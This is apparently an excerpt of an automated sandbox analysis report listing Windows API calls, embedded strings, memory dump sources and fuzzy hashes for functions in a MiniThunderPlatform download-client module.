                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 1004C171
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004C183
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1004C19E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004C1BB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,102768C4,102B1FC0), ref: 1004C1E1
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4394
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43C3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43E3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C43F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C4403
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF4E
                                                                                                                                                • Part of subcall function 100BCF20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,1024EB44,000000FF,1008A646), ref: 100BCF5C
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10034248
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(-00000004), ref: 10034285
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000,?,?,?,?,?), ref: 1003436D
                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?), ref: 1003437A
                                                                                                                                              • AtlComPtrAssign.ATL71 ref: 1003438D
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AssignCriticalSection$EnterEventLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3959862259-0
                                                                                                                                              • Opcode ID: 0ea8ad132e92c4cd0587013c1e70eda63fce18ead077faa1b73ad1b5e9e5a1c5
                                                                                                                                              • Instruction ID: d9599ab6a1949e13bd139a8ee9f40f5d621c2f3007966a20f2e4d4ccea4ef9a2
                                                                                                                                              • Opcode Fuzzy Hash: 0ea8ad132e92c4cd0587013c1e70eda63fce18ead077faa1b73ad1b5e9e5a1c5
                                                                                                                                              • Instruction Fuzzy Hash: B37169392083859FC316CF64C484B9BB7E5EB89601F46496CF88A9F251DB30FD49CB91
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10095510: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10095510: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992C7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100992D4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-00000064), ref: 100992F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10099303
                                                                                                                                              • memcpy.MSVCR71(00000000,?,?), ref: 10099382
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100993A4
                                                                                                                                                • Part of subcall function 10095E80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10095EF3
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F0A
                                                                                                                                                • Part of subcall function 10095E80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10095F19
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@V12@@$V01@@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1542101914-0
                                                                                                                                              • Opcode ID: 694d51c6d6d15dde5a7fae030bf1126a9dcaa3bbb63f1c64ebb13785a5803b63
                                                                                                                                              • Instruction ID: 69ff786a6b2868905cf93619dc7690a5059ab46d6cd91959c2a1281b613005c5
                                                                                                                                              • Opcode Fuzzy Hash: 694d51c6d6d15dde5a7fae030bf1126a9dcaa3bbb63f1c64ebb13785a5803b63
                                                                                                                                              • Instruction Fuzzy Hash: D7317730A00706DBDB18DFA8C998BEEB7F5FF48311F04415CE86A97291CB35AA05DB00
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10059068
                                                                                                                                              • ResetEvent.KERNEL32(00000000), ref: 10059081
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005908C
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,76105E10,?,00000000), ref: 100590D3
                                                                                                                                              • ResetEvent.KERNEL32(00000000,?,00000000), ref: 1005911F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005912A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$D@std@@EventLeaveResetU?$char_traits@V?$allocator@$??$?D@1@@std@@D@2@@0@0@EnterV?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4233836449-0
                                                                                                                                              • Opcode ID: 0cfd6d3458b016e3917f266db0d9547cea12f37ecf008165a5ba941d9dd75da1
                                                                                                                                              • Instruction ID: 9c55a2885134098e6b06a58272c8afd9762f8b76a7e084fe52891331506edb5c
                                                                                                                                              • Opcode Fuzzy Hash: 0cfd6d3458b016e3917f266db0d9547cea12f37ecf008165a5ba941d9dd75da1
                                                                                                                                              • Instruction Fuzzy Hash: A1319E7A504741DFC724DF14C988A9ABBF4FB8A750F404A1DF84683752C735A948CBA2
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 1020D668
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 1020D688
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 1020D6B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 5f3b045570b1811727bd6db85400a9c61df67e20953111073af2e24995f9c22b
                                                                                                                                              • Instruction ID: 05d545eb83efc4467927b8e53e28612a8652d3d7c572c706f6abd34ce3465204
                                                                                                                                              • Opcode Fuzzy Hash: 5f3b045570b1811727bd6db85400a9c61df67e20953111073af2e24995f9c22b
                                                                                                                                              • Instruction Fuzzy Hash: A22123312007218FC360DF19E888A5AF7F8FB496207014A59E54AC7B61C3B1FC85CF90
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075343
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1007536D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075377
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007538D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100753B2
                                                                                                                                                • Part of subcall function 1007518D: __EH_prolog.LIBCMT ref: 10075192
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075215
                                                                                                                                                • Part of subcall function 1007518D: memcpy.MSVCR71(000000AC,?,?), ref: 1007523E
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007526B
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007529E
                                                                                                                                                • Part of subcall function 1007518D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752BF
                                                                                                                                                • Part of subcall function 1007518D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100753D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@H_prolog$??1?$basic_string@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 874716554-0
                                                                                                                                              • Opcode ID: 7734128b63b5be517e434851fc16a1d52f6dc123bfd5fae37aac1f9f02cd7cfc
                                                                                                                                              • Instruction ID: 1fd25b81c00395f0ed3aed341ee64dd6d318196844c7df1cefc9176c1f55dfa2
                                                                                                                                              • Opcode Fuzzy Hash: 7734128b63b5be517e434851fc16a1d52f6dc123bfd5fae37aac1f9f02cd7cfc
                                                                                                                                              • Instruction Fuzzy Hash: 2F212275500654DFCB25CF68C888AEABBF4FF18310F044A5EE8AB83251DB74A904CB50
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100494F0
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10049501
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004951C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004951F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004952E
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10049535
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 1d0e4b08f21900218a12b53b3ca1366a1d70b0c6f762efe6f075e5c258047cb2
                                                                                                                                              • Instruction ID: b46e3823c683ede66b4881a3a2f4396d16374112aaa1029d14e6442ee641b66b
                                                                                                                                              • Opcode Fuzzy Hash: 1d0e4b08f21900218a12b53b3ca1366a1d70b0c6f762efe6f075e5c258047cb2
                                                                                                                                              • Instruction Fuzzy Hash: 35F0D1322006544FC321DB69ACCC9ABB7E8EB49650740443AE65283601C732F845DB24
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000517E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,100066D7,10311338), ref: 1000519D
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(102B24A0), ref: 100051C3
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,100066D7,10311338), ref: 100053D2
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10005195
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 1214878774-152884079
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldiv
                                                                                                                                              • String ID: .\file_io_unit.cpp$map_it != _data_map.end()$thunder_assert
                                                                                                                                              • API String ID: 3732870572-689295920
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?), ref: 1004D3CD
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004D3DF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1004D3FB
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004D418
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?), ref: 1004D58D
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004D59F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1004D5BB
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004D5D8
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              APIs
                                                                                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 1005012F
                                                                                                                                              • SetEvent.KERNEL32(?), ref: 10050191
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EventMultipleObjectsWait
                                                                                                                                              • String ID: .\wait_objects_thread.cpp$NULL$thunder_assert
                                                                                                                                              • API String ID: 1465615540-2870812305
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A12E3
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$_all_encoded_filename.size()>0$thunder_assert
                                                                                                                                              • API String ID: 2599707790-2298801233
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Set-Cookie), ref: 100983B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100983DC
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10097132
                                                                                                                                                • Part of subcall function 100970D0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 10097149
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10097164
                                                                                                                                                • Part of subcall function 100970D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10098303
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009840B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009842F
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@std@@V01@@V?$basic_string@$??$?8D@2@@0@$??$?9D@2@@0@0@
                                                                                                                                              • String ID: Set-Cookie
                                                                                                                                              • API String ID: 3682374639-497240083
                                                                                                                                              • Opcode ID: cc579d2685e6c3f9274c0867a4561da94171a61c8a5ddfeaaa38870afe555fff
                                                                                                                                              • Instruction ID: b31ec60a126572c5ceba5bde24653198ff7dc890f681b18011999626125d3121
                                                                                                                                              • Opcode Fuzzy Hash: cc579d2685e6c3f9274c0867a4561da94171a61c8a5ddfeaaa38870afe555fff
                                                                                                                                              • Instruction Fuzzy Hash: 77315A725087419FC314CF28C894A5FFBE8FF99754F004A1DF59A83261DB74A949CB62
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Set-Cookie), ref: 100983B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100983DC
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10097132
                                                                                                                                                • Part of subcall function 100970D0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 10097149
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10097164
                                                                                                                                                • Part of subcall function 100970D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10098303
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009840B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009842F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@std@@V01@@V?$basic_string@$??$?8D@2@@0@$??$?9D@2@@0@0@
                                                                                                                                              • String ID: Set-Cookie
                                                                                                                                              • API String ID: 3682374639-497240083
                                                                                                                                              • Opcode ID: 92466aedf9ecdb0d1754a56b9401ba56b33810d1230a1fb8d230b3129055c7df
                                                                                                                                              • Instruction ID: be0fb6f89ed63f522c52c7b02403112634cd268ef1a7ea2e78ce33ec2e8abbd3
